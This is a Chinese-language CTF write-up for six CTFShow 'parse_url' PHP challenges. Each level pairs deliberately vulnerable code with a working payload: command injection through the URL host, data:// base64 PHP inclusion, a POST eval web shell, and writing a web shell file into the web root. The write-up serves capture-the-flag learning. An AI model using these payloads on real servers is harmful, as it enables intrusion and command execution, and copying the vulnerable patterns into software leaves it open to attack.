AI 助理
备案控制台
开发者社区 云计算 文章 正文

CTFShow--周末大挑战parse_url篇Writeup

2023-10-30 143
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: CTFShow--周末大挑战parse_url篇Writeup

ac1de64c16214e479f8013ff07a17c86.pngCTFShow 平台:https://ctf.show/

第一关:

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-10 10:58:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
eval($data['host']);


Payload:?u=http://system('cd ..;cd ..;cd ..;cat flag_is_here.txt');


也可以通过POST去执行命令获取,得到flagflag_is_here.txtcat查看一下即可。

?u=http://eval($_POST[a]);
a=system("ls /");




6803af073de843ed839f516d5c49c4f7.png


2fab5ece38c54a37b8d15d280169fc82.png



ctfshow{a0e80fdb-2488-41ec-ab41-3f444485afb6}

第二关:

>  <?php
> 
> /*
> # -*- coding: utf-8 -*-
> # @Author: h1xa
> # @Date:   2023-05-10 09:52:06
> # @Last Modified by:   h1xa
> # @Last Modified time: 2023-05-12 13:25:53
> # @email: h1xa@ctfer.com
> # @link: https://ctfer.com
> 
> */
> 
> $data = parse_url($_GET['u']);
> include $data['host'].$data['path'];




fbe1efd8a0c14eb5963e78fcc28764c5.png


Payload:

 get:
 ?u=ctfshow://data:://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b



ctfshow{d855cf94-0ea0-4ae6-9983-25331dae4b3d}


第三关:

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
include $data['scheme'].$data['path'];

Payload:

get:?u=data:://test/plain;base64,PD9waHAgc3lzdGVtKCRfUE9TVFtBXSk7Pz4=
post:A=tac /_f*


ac1de64c16214e479f8013ff07a17c86.png



ctfshow{595cf0e0-350b-4a58-aa16-970b290fd1c9}

第四关:



<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:35
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
system($data['host']);

Payload:?u=http://cd ..;cd ..;cd ..;tac 1_f1ag_1s*

ctfshow{644f5bb8-5572-4569-882d-1a5673e01f9b}


第五关:

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
extract(parse_url($_GET['u']));
include $$$$$$host;




b53a041d8c854d1cb32c263b3b904519.png

Payload:

get:
?u=%75%73%65%72%3a%2f%2f%70%61%73%73%3a%71%75%65%72%79%40%73%63%68%65%6d%65%2f%3f%66%72%61%67%6d%65%6e%74%23%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%3b%62%61%73%65%36%34%2c%50%44%39%77%61%48%41%67%63%33%6c%7a%64%47%56%74%4b%43%52%66%55%45%39%54%56%46%74%42%58%53%6b%37%50%7a%34%3d
post:
A=tac /_f1a*


ctfshow{2c95c0cf-6c53-46ce-bd87-1221067bc07a}

第六关:

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);
file_put_contents($data['path'], $data['host']);



72f3075a00974a4fae046f8358d6140a.png


Payload:

get:
?u=http://111<script language="php">eval($_POST[A]);/var/www/html/zzz.php  
post:
A=system("tac /_f1a*");

1d4bdf855f7f4c44bd582110a75a0cd8.png



ctfshow{ba400845-b41f-4612-8f5a-30fa718db9a1}

至此本周的周末大挑战全部通过,感谢大家的观看和官网的wp不一样(当时做完了没有及时写 现在补完啦,又是充实的一天😊!)

落寞的鱼
目录
相关文章
给我杯冰美式
|
7月前
文件上传--Upload-labs--Pass12--(POST)00绕过
文件上传--Upload-labs--Pass12--(POST)00绕过
给我杯冰美式
67 0
Hong_zh0
|
7月前
|
PHP
Ctfshow基础二刷(1)
Ctfshow基础二刷(1)
Hong_zh0
50 0
老朱教授
|
JavaScript
Greasemonkey研究,通过GM_xmlhttpRequest获取远程URL的内容
老朱教授
3416 0
API19970108110
|
安全 网络安全
Ctfshow基础
Ctf
API19970108110
110 0
云内容小助手
|
JSON JavaScript 数据格式
HackerNews05-通过使用url模块的parse方法获取用户get提交的数据|学习笔记
快速学习 HackerNews05-通过使用url模块的parse方法获取用户get提交的数据
云内容小助手
131 0
HackerNews05-通过使用url模块的parse方法获取用户get提交的数据|学习笔记
小目标青年
搞什么啊? URI 和 URL 到现在还不清楚?
搞什么啊? URI 和 URL 到现在还不清楚?
小目标青年
212 0
搞什么啊? URI 和 URL 到现在还不清楚?
编程三昧
|
前端开发 网络协议 数据安全/隐私保护
【前端 · 面试 】HTTP 总结(十二)—— URL 和 URI
最近我在做前端面试题总结系列,感兴趣的朋友可以添加关注,欢迎指正、交流。
编程三昧
124 0
【前端 · 面试 】HTTP 总结(十二)—— URL 和 URI
码农技术君
|
数据采集 Python
Python爬虫:利用urlparse获取“干净”的url
Python爬虫:利用urlparse获取“干净”的url
码农技术君
150 0
码农技术君
|
Python
Python编程:urlsplit, urlparse简单区别
Python编程:urlsplit, urlparse简单区别
码农技术君
139 0
血手巴赫
|
存储 Web App开发 缓存
网红面试题:从输入 url 到看到页面发生了什么
从输入 url 到看到页面发生了什么
血手巴赫
205 0
网红面试题:从输入 url 到看到页面发生了什么

热门文章

最新文章

  • 1
    四大触点,教你从“用户视角”构建数据分析体系
  • 2
    Spring-boot+Dubbo应用启停源码分析
  • 3
    《Stata统计分析与应用(第2版)》一3.4 图形的保存、合并及修改
  • 4
    RocketMq-Request-Reply消息
  • 5
    Confluence 6 手动添加用户
  • 6
    2013年4月20日 通用权限管理系统组件V3.8功能改进说明
  • 7
    Configuring EIGRP Unequal-Cost Paths
  • 8
    PowerShell 指定关键词遍历文件内容
  • 9
    Windows时间服务出现故障 向用户发送错误的时间
  • 10
    三种dedecms调用相关文章的方法
  • 1
    《鸿蒙HarmonyOS应用开发从入门到精通(第2版)》简介
    55
  • 2
    《Python 助力:人工智能模型的“瘦身”与“加速”之旅》
    111
  • 3
    《非计算机专业者:Python 开启人工智能职业新航道》
    40
  • 4
    《Python赋能:智绘智慧城市新蓝图》
    43
  • 5
    《智育新篇:点亮学生人工智能伦理与社会责任之光》
    47
  • 6
    《数据主权:人工智能时代的核心基石与挑战》
    34
  • 7
    鸿蒙HarmonyOS应用开发 | 探索 HarmonyOS Next-从开发到实战掌握 HarmonyOS Next 的分布式能力
    111
  • 8
    鸿蒙原生开发环境的创新与性能优化:从工具到跨平台支持的全方位提升
    280
  • 9
    鸿蒙HarmonyOS应用开发 | 「鸿蒙技术分享」HarmonyOS NEXT元服务卡片实战体验
    165
  • 10
    Qwen-Coder:通过Qwen 2.5模型实现智能代码生成的技术实践
    41

    • 相关电子书

    更多
  • A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages
  • 低代码开发师(初级)实战教程
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    DataWorks售前咨询